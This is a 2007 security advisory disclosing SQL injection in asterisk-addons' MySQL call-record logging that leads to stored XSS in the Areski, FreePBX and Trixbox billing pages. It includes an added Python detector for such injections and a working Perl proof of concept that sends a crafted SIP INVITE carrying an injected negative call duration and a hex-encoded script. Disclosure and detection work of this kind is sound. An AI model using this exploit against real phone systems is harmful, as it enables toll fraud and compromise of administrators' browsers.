phone-sqlxss.txt

2007-10-23T00:00:00
ID PACKETSTORM:60297
Type packetstorm
Reporter Radu State
Modified 2007-10-23T00:00:00

Description

                                        
In a previous post (http://seclists.org/fulldisclosure/2007/Oct/0174.html),
we have seen how XSS injection can be performed over SIP to inject malicious
JavaScript into the browser of a user who checks the call history of his
phone. In this post, we will detail how XSS injection can be performed over
SIP through an additional SQL injection.

Some SIP proxies store information gathered from SIP headers in databases
used for billing and accounting purposes. This is also the case for the
vulnerability disclosed in the following. If this information is not
properly filtered, once it is displayed to the administrator it can
perform a second-order SQL injection, that is: during the display, it gets
interpreted as SQL by the application. In this case, two things can result.
First, the database can be changed (for instance the call length can be
changed to a small value and thus the caller can commit toll fraud).
Sometimes, if the target system is not well secured, SQL injection can lead
to system compromise because most database servers allow some interaction
with the target OS.

However, the additional feature is that XSS can also result, because
JavaScript can be stored in the database with the SQL injection and
executed in the browser when the admin checks it (this is a kind of log
injection process). As was pointed out in my previous posting, XSS can be
used with tools like Beef and XSS proxy to scan the internal network or
deactivate firewalls; basically, all the dangers of CSRF/XSRF are now a
reality. The main issue is that most applications that deal with CDR data
do not consider this type of threat.

Title: SQL injection in asterisk-addons and XSS injection in WWW
application in Areski, FreePBX and Trixbox

Id: KIPH 12

Credits

Humberto Abdelnur (Ph.D student), the Madynes group at INRIA
Radu State (Ph.D), the Madynes group at INRIA
Olivier Festor (Ph.D), the Madynes group at INRIA

Software versions for which vendors were notified:

Asterisk-addons (SQL injection)
Areski v2.0.1 and earlier (XSS injection)
FreePBX 2.3.00 and earlier (XSS injection)
Trixbox v2.3.1 and earlier (XSS injection)

Severity: High, XSS and SQL injection can lead to the compromise of an
internal network

Overview:

Asterisk itself does not support billing reports but provides libraries,
asterisk-addons, which may allow a third party to compute them. Specifically,
the functions exported by cdr_addon_mysql.c allow logging the Call Detail
Records (CDR) in a MySQL database.

Areski, FreePBX and Trixbox use the information stored in such a database in
order to manage, compute and generate billing reports or display the load of
the PBX.

Vulnerability Synopsis:

Certain functions in cdr_addon_mysql.c do not properly escape input
characters from fields of incoming calls before storing them in the
database. This issue allows a malicious user two main attacks:

1. Inject SQL statements which obfuscate the quantity of minutes used
for billing.
2. Inject through the SQL statement values which are recognized as
JavaScript when a WWW management application for CDR runs.

The attack may be performed by an unsubscribed user in the domain (if
anonymous calls are allowed).
This attacker may inject negative numbers into the CDR table in order to
decrease the minutes of calling. Also, the attacker may inject JavaScript
tags to be executed on the administrator's PC when she/he enters the CDR
website.

Note that in order to perform the cross-site script injection, the SQL
injection technique is necessary because special characters such as "<" are
filtered by Asterisk, while with the SQL injection they can be rewritten as
0x60 (hexadecimal representation), which won't be filtered.
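
A defender-side check for the pattern described above, added here as an example and not part of the advisory or of asterisk-addons: it extracts the user part of a SIP INVITE Request-URI, flags SQL metacharacters and hex literals that decode to markup, sanity-checks stored CDR rows for negative durations and markup, and shows the entity encoding a CDR web page should apply on output. The sample INVITE, the 192.0.2.x addresses and the CDR column names are constructed assumptions.

```python
import html
import re

# Characters that end a quoted SQL value or start a comment, plus MySQL-style hex literals.
SQL_META = re.compile(r"""['"\\;]|/\*|--""")
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")
HTML_TAG = re.compile(r"<\s*/?\s*[a-zA-Z]")

def request_uri_user(sip_msg):
    """User part of the Request-URI on the first line of a SIP request."""
    request_line = sip_msg.split("\r\n", 1)[0]
    uri = request_line.split(" ", 1)[1].rsplit(" SIP/2.0", 1)[0]
    uri = uri.split(":", 1)[1] if ":" in uri else uri       # drop the "sip:" scheme
    return uri.rsplit("@", 1)[0] if "@" in uri else uri     # drop the host part

def classify_user_part(user):
    """Injection indicators present in a SIP user part (empty list means clean)."""
    findings = []
    if SQL_META.search(user):
        findings.append("sql-metacharacters")
    for hexdigits in HEX_LITERAL.findall(user):
        # MySQL reads 0x3c73... as a binary string, so decode it and look for markup.
        decoded = bytes.fromhex(hexdigits[: len(hexdigits) // 2 * 2]).decode("latin-1")
        if HTML_TAG.search(decoded):
            findings.append("hex-encoded-markup")
    return findings

def classify_cdr_row(row):
    """Indicators on a stored CDR row: impossible durations and markup in text fields."""
    findings = [f"negative-{col}" for col in ("duration", "billsec") if int(row.get(col, 0)) < 0]
    findings += [f"markup-in-{col}" for col, v in row.items() if isinstance(v, str) and HTML_TAG.search(v)]
    return findings

def render_cell(value):
    """What a CDR web page should emit for a cell: entity-encoded, never raw."""
    return html.escape(str(value), quote=True)

# Constructed sample (assumed addresses): the request line and headers the advisory's
# PoC sends, with the hex literal spelling out <script>alert(1)</script>.
SCRIPT_HEX = "3c7363726970743e616c6572742831293c2f7363726970743e"
SAMPLE_INVITE = (
    f"INVITE sip:',1,2,3,4,5,-9,-9,0x{SCRIPT_HEX},6,7,8)/*@192.0.2.10 SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.0.2.99;branch=z9hG4bK1;rport\r\n"
    "From: <sip:attacker@192.0.2.99>;tag=1\r\n\r\n"
)
# Constructed CDR row as it would look after the injection succeeded (column names assumed).
SAMPLE_ROW = {"src": "attacker", "dst": "<script>alert(1)</script>", "duration": -9, "billsec": -9}
```

Run the classifiers at the SIP edge (on Request-URI, From, To and Contact user parts) and as a periodic query over the CDR table; the rendering helper belongs in the web application's output path, not in the insert path.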
  
Impact:

Information in the database can be manipulated for malicious use.

Malicious scripts may be executed on the administrator's machine.

Proof of Concept:

The script will create an entry with duration values -9 and
<script>alert(1)</script> that will be shown when the administrator checks
the website.

Command: asterisk_cdr_sqlinjection.pl <callUser> <targetIP> <targetPort>
<attackerUser> <localIP> <localPort>

--   
  
#!/usr/bin/perl

#############################################
# Vulnerability discovered using KiF ~ Kiph #
#                                           #
# Authors:                                  #
# Humberto J. Abdelnur (Ph.D Student)       #
# Radu State (Ph.D)                         #
# Olivier Festor (Ph.D)                     #
#                                           #
# Madynes Team, LORIA - INRIA Lorraine      #
# http://madynes.loria.fr                   #
#############################################

use strict;
use warnings;
use IO::Socket::INET;
use String::Random;

my $foo = String::Random->new;

die "Usage $0 <callUser> <targetIP> <targetPort> <attackerUser> <localIP> <localPort>\n"
    unless defined $ARGV[5];

# Hex-encode a string so it can be sent as a MySQL 0x... literal instead of
# raw characters such as "<" that Asterisk filters.
sub iso2hex($) {
    my $hex = '';
    for (my $i = 0; $i < length($_[0]); $i++) {
        my $ordno = ord substr($_[0], $i, 1);
        $hex .= sprintf("%lx", $ordno);
    }
    $hex =~ s/ $//;
    $hex;
}

my $callUser   = $ARGV[0];
my $targetIP   = $ARGV[1];
my $targetPort = $ARGV[2];

my $attackerUser = $ARGV[3];
my $attackerIP   = $ARGV[4];
my $attackerPort = $ARGV[5];

# UDP socket towards the target SIP port, bound to the given local port.
my $socket = IO::Socket::INET->new(
    Proto     => 'udp',
    PeerPort  => $targetPort,
    PeerAddr  => $targetIP,
    LocalPort => $attackerPort,
) or die "Cannot create socket: $!\n";

# User part of the Request-URI: the value cdr_addon_mysql.c stores unescaped.
my $scriptinjection = iso2hex("<script>alert(1)</script>");
my $sqlinjection    = "',1,2,3,4,5,-9,-9,0x$scriptinjection,6,7,8)/*";

my $callid = $foo->randpattern("CCccnCn");
my $cseq   = $foo->randregex('\d\d\d\d');

# SDP body; each line ends in "\r" followed by the literal newline (CRLF).
my $sdp = "v=0\r
o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r
s=-\r
c=IN IP4 $attackerIP\r
t=0 0\r
m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r
a=sendrecv\r
a=ptime:20\r
a=maxptime:200\r
a=fmtp:96 mode-change-neighbor=1\r
a=fmtp:18 annexb=no\r
a=fmtp:98 0-15\r
a=rtpmap:96 AMR/8000/1\r
a=rtpmap:0 PCMU/8000/1\r
a=rtpmap:8 PCMA/8000/1\r
a=rtpmap:97 iLBC/8000/1\r
a=rtpmap:18 G729/8000/1\r
a=rtpmap:98 telephone-event/8000/1\r
a=rtpmap:13 CN/8000/1\r
";
my $sdplen = length $sdp;

my $msg = "INVITE sip:$sqlinjection\@$targetIP SIP/2.0\r
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1;rport\r
From: <sip:$attackerUser\@$attackerIP>;tag=1\r
To: <sip:$callUser\@$targetIP>\r
Call-ID: $callid\@$attackerIP\r
CSeq: $cseq INVITE\r
Max-Forwards: 70\r
Contact: <sip:$attackerUser\@$attackerIP>\r
Content-Type: application/sdp\r
Content-Length: $sdplen\r
\r
$sdp";

$socket->send($msg);